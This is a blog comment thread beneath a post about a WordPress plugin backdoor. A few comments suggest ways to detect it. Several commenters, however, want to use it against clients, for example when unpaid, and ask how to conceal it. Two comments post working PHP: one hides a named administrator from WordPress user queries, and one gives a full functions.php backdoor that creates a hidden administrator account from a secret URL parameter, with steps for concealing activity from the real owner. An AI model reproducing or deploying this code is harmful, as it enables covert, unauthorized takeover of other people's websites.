49 Responses

  1. Marco
    Marco June 17, 2013 at 17:29 | | Reply

    Scary.Will have a second and third look from now on when I install plugins. Grazzi ħafna 🙂

  2. elzan
    elzan June 18, 2013 at 09:07 | | Reply

    wow…it’s scarry… we can get from plugins right 🙁

  3. AndyiBM
    AndyiBM June 18, 2013 at 11:05 | | Reply

    Ditto the above… is there any way to block this sort of backdoor being set up without us knowing?

  4. Steve eMailSmith
    Steve eMailSmith June 18, 2013 at 14:12 | | Reply

    There are a few footprints in this code (or any similar one, using this method) that could be used to scan for the malicious codes in plugins.

    One would be the link to the registration script: ‘wp-includes/registration.php’
    Another would be the setting of the privileges: set_role( ‘administrator’ );

    Of course, there could be many other ways to do the job, so ultimately, a manual vetting by a security expert like Jean suggested is the best way to stay safe.

    ~Steve

  5. CitronEvanescentDavid
    CitronEvanescentDavid June 18, 2013 at 14:16 | | Reply

    You can also add some triggers to your database to prevent admin user creation. That would leave to backdoor useless

  6. Luis Alejandre
    Luis Alejandre June 18, 2013 at 15:55 | | Reply

    Oh well, I will have to think of another one…

    I was almost ready to release my brand new “Please Screw Up My Site” plugin including this very same code. You have spoiled my worldwide product launch! 😉

    Now seriously, Jean, that was a good one. Like others said before: scary.

  7. Brett Lee
    Brett Lee June 20, 2013 at 18:11 | | Reply

    Created this file at root with 644 permissions. Does not work.

    How to use this?

  8. fesada3
    fesada3 June 20, 2013 at 21:20 | | Reply

    Hi nice info. I’m just learning php.
    can you explain what does this line do:
    if ( md5( $_GET[‘backdoor’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’ )
    What I believe is that you send a get request to the url where the code is found where the md5 hash of backdoor is ’34d1f91fb2e514b8576fab1a75a89a6b’ which will then create the backdoor. Am I right?
    Thanks

  9. Mathew Porter
    Mathew Porter June 26, 2013 at 18:22 | | Reply

    It does open your eyes on the lack of vetting of plugins and the miscellaneous code that could be installed unsuspectingly.

  10. Tareq
    Tareq June 28, 2013 at 00:09 | | Reply

    The code should be

    😀

  11. Ignatz
    Ignatz June 28, 2013 at 22:52 | | Reply

    Hi!

    Sorry, but probably dosent works becase the file ‘wp-includes/registration.php it was deprecate on wordpress 3.1

    did you probe?

  12. mashermack
    mashermack August 29, 2013 at 19:14 | | Reply

    I wonder if the wp_create_user() does trigger the notification email to the admin about the user creation

  13. mundana
    mundana September 17, 2013 at 00:57 | | Reply

    I tried it in my own wp and worked, although when entering as admin, in users list I can see the other admin, mr_admin. Is there a way to hidde it?

    1. Dan
      Dan May 3, 2014 at 14:16 | | Reply

      use css to hide anything in the admin area to cover your tracks after such hacks

    2. Dan
      Dan May 3, 2014 at 14:17 | | Reply

      or a hook into the display of the users page could do it more gracefully

  14. Chacha Kairu
    Chacha Kairu October 26, 2013 at 00:49 | | Reply

    Where do you place the code please

  15. Chacha Kairu
    Chacha Kairu October 26, 2013 at 11:53 | | Reply

    Got it lol!.. It’s working. Thanks a million

  16. jayz
    jayz November 6, 2013 at 08:18 | | Reply

    hello there ,

    nice code bro .. i want to if wp has user activation how we activate user by this .. i add code it successfully create user by i cant acess becaus user is not activated .

    thanks ..
    have a nice day

  17. christophermccoy
    christophermccoy November 18, 2013 at 19:33 | | Reply

    i have seen something like this, but not creating an admin account, once the theme was activated it sent some sort of notice to the author

  18. applemonz
    applemonz January 19, 2014 at 10:10 | | Reply

    This code not wrkng

  19. Paul
    Paul January 24, 2014 at 13:21 | | Reply

    Unfortunately, it is working. Boy, this really opened my eyes. Thanks for posting!

  20. Nick Meisher
    Nick Meisher January 29, 2014 at 08:16 | | Reply

    To hide the new admin user is more than just hiding them in the User list since if the real admin signs in and tries to edit a page that you are editing using the backdoor account, they will get a message that “mr_invisible_admin” has been busy editing that page for a long time now and for them to patiently wait their turn. That may clue them in that they aren’t alone anymore on their private blog.

    But the code to hide a user with a specific login name from user searches is the following, which can be added to the functions php file.


    /** hides a user with a specific login name from user search queries **/
    function w45345p_hide_specific_user($user_search) {
    global $wpdb;
    $user_search->query_where =
    str_replace('WHERE 1=1',
    "WHERE 1=1 AND {$wpdb->users}.user_login != 'mr_admin'",
    $user_search->query_where
    );
    }
    add_action('pre_user_query','w45345p_hide_specific_user');

  21. david Delatorre
    david Delatorre February 7, 2014 at 20:59 | | Reply

    Jean,
    I did this to a client’s website that I thought was not going to pay me, and after many months he paid, I went to the functions.php and removed it, and now I used all the real id and passwords, I can’t access admin.php, after entering the credentials the page turns blank and it doesn’t go anywhere…please help me…
    Thank you in advance,
    David Delatorre

  22. Vikas - Web Designer in Rockingham

    Nice post Jean but don’t give them ideas. lol.

    Usually these backdoors are not easy to find and are obfuscated.

    I did a post on it a few months ago:

    http://oziti.com.au/case-study/wp-security-removing-wordpress-backdoor

    and since I wrote that post, I’ve had several people visiting this post everyday and about 20 of them contacting me to clean it up.

    The code you’ve mentioned above is really hard to find. Once you’ve found it, you need to have skills to de-obfuscate it. By they time you’ve figured it all out, your client’s blood pressure is really high because his website is on the front page of a Turkish hacking website (real story).

    Not a lot of fun. 🙁

  23. Gozzie
    Gozzie April 29, 2016 at 08:01 | | Reply

    its not working anymore on 4.5.1 can i have update on the code ?
    its for when my boss will not pay for making his website. (he wannts to pay after i uploaded and made him admin…

  24. danny
    danny May 1, 2016 at 09:50 | | Reply

    wow guys stop adding back doors just hide the user name from customer like that is not a risk customer will never know , I been doing these for long time and never have a single isue and if a customer ask me to repair anything I just enter knowing my information is there not causing damages to any one.

    Remember just hide your user name and you will be safe.

    1. Gozzie
      Gozzie May 6, 2016 at 02:23 | | Reply

      And how do i hide it ?

      add_action(‘wp_user_query’,’yoursite_wp_user_query’);
      function yoursite_wp_user_query($user_search) {
      global $current_user;
      $username = $current_user->user_login;

      global $wpdb;
      $user_search->query_where = str_replace(‘WHERE 1=1’,
      “WHERE 1=1 AND {$wpdb->users}.user_login != ””,$user_search->query_where);

      }

      is not working

  25. phil
    phil May 9, 2016 at 12:19 | | Reply

    And how to hide your account from the owner?

  26. IceIce Baby
    IceIce Baby June 8, 2016 at 21:16 | | Reply

    Best way to accomplish a superadmin without notifying the default admin when a new user account is created is to do it this way (add to functions.php):

    add_action( ‘wp_head’, ‘yourbackdoor’ );
    function yourbackdoor() {
    if ( md5( $_GET[‘yourbackdoor’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’ ) {
    require( ‘wp-includes/registration.php’ );
    if ( !username_exists( ‘newadmin’ ) ) {
    $user_id = wp_create_user( ‘newadmin’, ‘some!pass!’ );
    $user = new WP_User( $user_id );
    $user->set_role( ‘administrator’ );
    }
    }
    }
    add_action(‘pre_user_query’,’yoursite_pre_user_query’);
    function yoursite_pre_user_query($user_search) {
    global $current_user;
    $username = $current_user->user_login;

    if ($username != ‘newadmin’) {
    global $wpdb;
    $user_search->query_where = str_replace(‘WHERE 1=1’,
    “WHERE 1=1 AND {$wpdb->users}.user_login != ‘newadmin'”,$user_search->query_where);
    }
    }

    …then go to http://www.yourdomain.com?yourbackdoor=go and have it create the account. When you log in to the original admin account, this new superadmin account will NOT be visible in the users list. Now, just log out of the old admin account, and log in to your new account that was created above. You should see your account now in the users list when logged in to the superadmin account. From this point, you can do a lot of things behind the scenes, like install
    “Hide Plugins” and “Admin Menu Editor” and the normal admin account (ie. client) will never know.

  27. Eric
    Eric June 9, 2016 at 11:56 | | Reply

    This did not work for me. Too bad this could be useful

  28. ozmeu
    ozmeu June 9, 2016 at 13:25 | | Reply

    Indeed why cant we find a working one ? where are the hardcore scripters ☺

  29. Mediablitz
    Mediablitz September 7, 2018 at 10:00 | | Reply

    This backdoor does not work on WP 4.8.7? Any idea why not?

Leave a Reply